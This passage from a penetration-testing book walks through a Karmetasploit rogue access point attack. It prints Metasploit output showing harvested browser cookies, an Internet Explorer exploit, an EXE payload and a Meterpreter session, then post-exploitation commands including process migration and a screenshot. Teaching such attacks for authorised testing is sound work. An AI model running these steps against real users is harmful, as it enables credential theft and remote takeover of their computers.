At this point, the user has no new messages, so he decides to do some web browsing. When the browser opens, a captive portal is presented to the user, as shown in Figure 12-1.
As the user sits in front of his computer wondering what’s going on, Karmetasploit is busy configuring the attack to capture cookies; set up fake email, DNS, and other servers; and launch exploits against the client’s browser—all the result of the magic contained in our karma.rc file.
Of course, some degree of luck is involved in this attack. The browser will display a “Loading” page while exploits are launched. If the user is impatient, he may simply close the browser window, which will stop our exploits.
Next, you can see the massive amount of output that results from this attack:
[*] HTTP REQUEST 10.0.0.100 > www.microsoft.com:80 GET /isapi/redir.dll Windows IE 6.0 cookies=WT_NVR=0=/:1=downloads:2=downloads/en; WT_FPC=id=111.222.333.444-1008969152 .30063513:lv=1267703430218:ss=1267703362203;MC1 =GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH= d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAu BwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C864 18EBC913CE45C4326AE [*] Request '/ads' from 10.0.0.100:1371 [*] HTTP REQUEST 10.0.0.100 > adwords.google.com:80 GET /forms.html Windows IE 6.0 cookies= [*] HTTP REQUEST 10.0.0.100 > blogger.com:80 GET /forms.html Windows IE 6.0 cookies= [*] HTTP REQUEST 10.0.0.100 > care.com:80 GET /forms.html Windows IE 6.0 cookies= [*] HTTP REQUEST 10.0.0.100 > careerbuilder.com:80 GET /forms.html Windows IE 6.0 cookies= [*] HTTP REQUEST 10.0.0.100 > ecademy.com:80 GET /forms.html Windows IE 6.0 cookies= [*] HTTP REQUEST 10.0.0.100 > facebook.com:80 GET / forms.html Windows IE 6.0 cookies=. . . SNIP . . .
[*] HTTP REQUEST 10.0.0.100 > www.slashdot.org:80 GET /forms.html Windows IE 6.0 cookies= [*] HTTP REQUEST 10.0.0.100 > www.twitter.com:80 GET /forms.html Windows IE 6.0 cookies= [*] Request '/ads?sessid=V2luZG93czpYUDpTUDI6ZW 4tdXM6eDg2Ok1TSUU6Ni4wO1NQMjo%3d' from 10.0.0.100:1371 [*] JavaScript Report: Windows:XP:SP2:en-us:x86:MSIE:6.0;SP2: [*] Responding with exploits [*] HTTP REQUEST 10.0.0.100 > www.xing.com:80 GET / forms.html Windows IE 6.0 cookies= [*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET /forms.html Windows IE 6.0 cookies= [*] HTTP REQUEST 10.0.0.100 > www.ziggs.com:80 GET /forms.html Windows IE 6.0 cookies= [*] HTTP REQUEST 10.0.0.100 > xing.com:80 GET /forms.html Windows IE 6.0 cookies= [*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET /forms.html Windows IE 6.0 cookies= [*] HTTP REQUEST 10.0.0.100 > ziggs.com:80 GET /forms.html Windows IE 6.0 cookies= [*] HTTP REQUEST 10.0.0.100 > care.com:80 GET / Windows IE 6.0 cookies= [*] HTTP REQUEST 10.0.0.100 > www.care2.com:80 GET / Windows IE 6.0 cookies= [*] HTTP REQUEST 10.0.0.100 > activex.microsoft.com:80 POST /objects/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss= 1267703362203; MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4& HASH=d23f&LV=20103&V=3;A=I&I= AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE [*] HTTP 10.0.0.100 attempted to download an ActiveX control [*] HTTP REQUEST 10.0.0.100 > activex.microsoft.com:80 POST /objects/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152. 30063513:lv=1267703430218:ss=126770 3362203; MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d2 3f&LV=20103&V=3;A=I&I= AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE [*] HTTP 10.0.0.100 attempted to download an ActiveX control [*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 10.0.0.100:1371... [*] HTTP REQUEST 10.0.0.100 > activex.microsoft.com:80 POST /objects/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss= 1267703362203; MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4& HASH=d23f&LV=20103&V=3;A=I&I= AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE [*] HTTP 10.0.0.100 attempted to download an ActiveX control [*] HTTP REQUEST 10.0.0.100 > codecs.microsoft.com:80 POST /isapi/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv =1267703430218:ss=1267703362203; MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f& LV=20103&V=3; A=I&I=AxUFAAAAAAAu BwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE. . . SNIP . . .
[*] HTTP 10.0.0.100 attempted to download an ActiveX control [*] HTTP REQUEST 10.0.0.100 > codecs.microsoft.com:80 POST /isapi/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.300 63513:lv=1267703430218:ss=1267703362203; MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f& LV=20103&V=3; A=I&I=AxUFAAAAAAAu BwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE [*] HTTP REQUEST 10.0.0.100 > codecs.microsoft.com:80 POST /isapi/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063 513:lv=1267703430218:ss=1267703362203; MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f& LV=20103&V=3; A=I&I=AxUFAAAAAAAu BwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE [*] HTTP REQUEST 10.0.0.100 > codecs.microsoft.com:80 POST /isapi/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513: lv=1267703430218:ss=1267703362203; MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f& LV=20103&V=3; A=I&I=AxUFAAAAAAAu BwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE [*] Sending EXE payload to 10.0.0.100:1371... [*] Sending stage (748032 bytes) to 10.0.0.100 [*] Meterpreter session 1 opened (10.0.0.1:3333 -> 10.0.0.100:1438)
In this output, you can see at that Metasploit first lets the client know that various popular websites are in fact located on the attacking machine. Then, at , it uses JavaScript to determine the target’s operating system and browser, and responds at with exploits based on that fingerprint. At the client is presented with a malicious ActiveX control, resulting in the familiar yellow prompt bar in Internet Explorer, shown at the top of Figure 12-1. You can also see buried in the output at that an exploit was launched against the client. After a brief period, you see at that the exploit was successful and a Meterpreter session has been opened on the target PC!
Returning to msfconsole, we can interact with the session that was created and check to see what permissions we have obtained on the target. Remember, when you exploit a browser it’s always a good idea to migrate your process out of the web browser in case it gets closed.
meterpreter >sessions -i 1
[*] Starting interaction with 1... meterpreter >sysinfo
Computer: V-XP-SP2-BARE OS : Windows XP (Build 2600, Service Pack 2). Arch : x86 Language: en_US meterpreter >getuid
Server username: V-XP-SP2-BAREAdministrator meterpreter >run migrate -f
[*] Current server process: jEFiwxBKyjoHGijtP.exe (3448) [*] Spawning a notepad.exe host process... [*] Migrating into process ID 2232 [*] New server process: notepad.exe (2232) meterpreter >screenshot
Screenshot saved to: /opt/metasploit3/msf3/rkGrMLPa.jpeg meterpreter >
Because this is a default installation of Windows XP SP2 with the very insecure Internet Explorer 6 installed (both of which are highly out of date), the client didn’t even need to accept and install the malicious ActiveX control.